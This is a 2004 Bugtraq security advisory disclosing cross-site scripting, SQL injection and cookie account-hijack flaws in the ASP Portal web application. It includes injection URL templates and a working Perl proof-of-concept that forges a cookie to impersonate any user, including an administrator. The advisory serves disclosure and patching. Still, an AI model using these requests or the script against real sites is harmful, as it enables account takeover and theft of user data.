ASP Portal Multiple Vulnerabilities

From: Manuel López (mantra_at_gulo.org)
Date: 02/14/04

  • Next message: John Compton: "Misinformation in Security Advisories (ASN.1)"
    To: bugtraq@securityfocus.com
    Date: Sat, 14 Feb 2004 06:16:35 +0100
    
    

     -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    Title: Asp Portal Multiple Vulnerabilities

    By: Manuel López

    Software: Asp Portal

    Vendor Description:
    ASP Portal is a an ASP powered portal site which uses an Access database to
    store all the site info. The script also includes and easy to use Admin
    Interface, so you can change everything you need to online, which makes
    maintaing the site very easy.

    Severity:
    Moderately critical

    Impact:
    Disclosure of authentication information, Disclosure of user information,
    Execution of arbitrary code via network, Modification of user information,
    ID Spoofing.

    Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

    Description:

     ---- Cross-Site Scripting ----

    This product is vulnerable to the Cross-Site Scripting vulnerability that
    would allow attackers to inject HTML and script codes into the pages and
    execute it on the client's browser.

    http://localhost/index.asp?inc='>[XSS]
    http://localhost/index.asp?inc=profile&searchtext='>[XSS]
    http://localhost/index.asp?inc=forumread&article='>[XSS]

     ---- Image ScriptCode Injection ----

    An attacker can inject arbitrary HTML or scriptcode instead of an Image in
    "photograph URL" of user's 'details' page.
    javascript:alert()

     ---- Sql Injection ----

    Another problem of sanitation could lead an attacker to inject SQL code to
    manipulate and disclose various information from the database. The problem
    is in the fields 'pageid' and 'downloadscat'.

    http://localhost/index.asp?inc=blog&pageid='[SqlQuery]
    http://localhost/index.asp?inc=downloadssub&downloadscat='[SqlQuery]

    Also it is possible an Sql Injection in the cookie, in 'thenick' field.

    GET http://localhost/index.asp HTTP/1.1
    Cookie: thenick='[SqlQuery]

     ---- Cookie Account Hijack ----

    It is possible to impersonate others by manipulating the 'thenick' parameter
    in the cookie.
    Modifying the cookie is possible to gain access to other account. This issue
    can be exploited to gain an administrative account with the service.

     ---- PROOF OF CONCEPT COOKIE ACCOUNT HIJACK ----

    #!/usr/bin/perl -w
    ## PROOF OF CONCEPT COOKIE ACCOUNT HIJACK
    ## Example: Asp-POC.pl localhost portal/index.asp Admin respuesta.htm

    use IO::Socket;
    if (@ARGV < 4)
    {
    print "\n\n";
    print " ____________________________________________________________ \n";
    print "| |\n";
    print "| PROOF OF CONCEPT COOKIE ACCOUNT HIJACK |\n";
    print "| Usage:Asp-POC.pl [host] [directorio] [usuario] [fichero] |\n";
    print "| |\n";
    print "| By: Manuel López #IST |\n";
    print "|____________________________________________________________|\n";
    print "\n\n";
    exit(1);
    }

    $host = $ARGV[0];
    $directorio = $ARGV[1];
    $usuario = $ARGV[2];
    $fichero = $ARGV[3];

    print "\n";
    print "----- Conectando <----\n";
    $socket = IO::Socket::INET->new(Proto => "tcp",
    PeerAddr => "$host",PeerPort => "80") || die "$socket error $!";
    print "====> Conectado\n";
    print "====> Enviando Datos\n";
    $socket->print(<<taqui) or die "write: $!";
    GET http://$host/$directorio HTTP/1.1
    Cookie: thenick=$usuario

    taqui
    print "====> OK\n";
    print "====> Generando $fichero ...\n";
    open( Result, ">$fichero");
    print Result while <$socket>;
    close Result;

     ------------------------------------------------

    Solution:
    Vendor contacted.
    The vulnerabilities have reportedly been fixed in the new version.
    Download the January patch:
    http://www.aspportal.net/downloadsviewer.asp?theurl=38 or buy the new
    version.

     ---- Credits ----

    Manuel López ( mantra@gulo.org ) #IST
    Special Thank´s: -- Aklis -- gulo.org

    Kein, Skool, TheChakal, vientoS, |RDR|, NSR500, ^SaRgE^ .. and all the #IST
    staff.

    Excuse me for speaking English so badly.

     -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.2.1

    iD8DBQFALavflZD3/ZFHM4ERApRSAJ46rZRn3OlSXp/k2jXwCXT0S0RLywCgn08e
    mx+V1tKxAMSzt7PTgVh2D2A=
    =0oiR
     -----END PGP SIGNATURE-----


  • Next message: John Compton: "Misinformation in Security Advisories (ASN.1)"

    Relevant Pages